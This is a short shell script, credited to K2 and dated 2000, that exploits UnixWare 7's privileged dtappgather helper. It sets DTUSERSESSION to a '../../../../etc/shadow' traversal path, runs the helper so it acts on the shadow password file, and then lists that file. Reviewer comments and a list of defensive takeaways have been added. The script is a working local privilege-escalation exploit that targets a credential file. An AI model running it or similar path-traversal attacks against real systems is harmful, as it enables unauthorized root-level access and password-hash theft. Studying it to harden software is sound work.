#!/bin/sh
#
#   UnixWare 7's dtappgather
#   Discovered by: K2 (ktwo@ktwo.ca)
#
# UnixWare 7's dtappgather runs with superuser
# privileges, but does not properly check the file
# named by $DTUSERSESSION to ensure that it is
# readable/writable or owned by the user running it.

# Demonstrates the missing check on $DTUSERSESSION by pointing it at /etc/shadow.
#
# DTUSERSESSION comes from the caller's environment, so the caller controls it.
# The value is a relative path whose ../ components climb out of whatever
# directory dtappgather prepends to it and resolve to /etc/shadow.
# NOTE(review): the base directory dtappgather uses is not shown in this file;
# four levels up is what this script assumes.
export DTUSERSESSION=../../../../etc/shadow
# Run the helper from its install directory; it inherits the exported variable.
# NOTE(review): the result of cd is not checked. If /usr/dt/bin does not exist,
# the next line runs ./dtappgather from the current directory instead.
cd /usr/dt/bin
./dtappgather
# List owner and mode of /etc/shadow after the run. Presumably a change in
# ownership or permissions is the visible effect; compare against a listing
# taken beforehand to confirm.
ls -la /etc/shadow
# Defensive takeaways:
#  - A program running with elevated privileges should not build file paths
#    from environment variables without rejecting "/" and ".." components.
#  - File operations done on a user's behalf should run with that user's
#    privileges, or verify ownership on the opened file.
#  - Until the binary is fixed, removing its elevated privilege limits exposure
#    (assumes the privilege comes from a setuid bit; verify on the host).
#  - An unexpected owner or mode on /etc/shadow is a sign worth alerting on.

#                 www.hack.co.za           [2000]#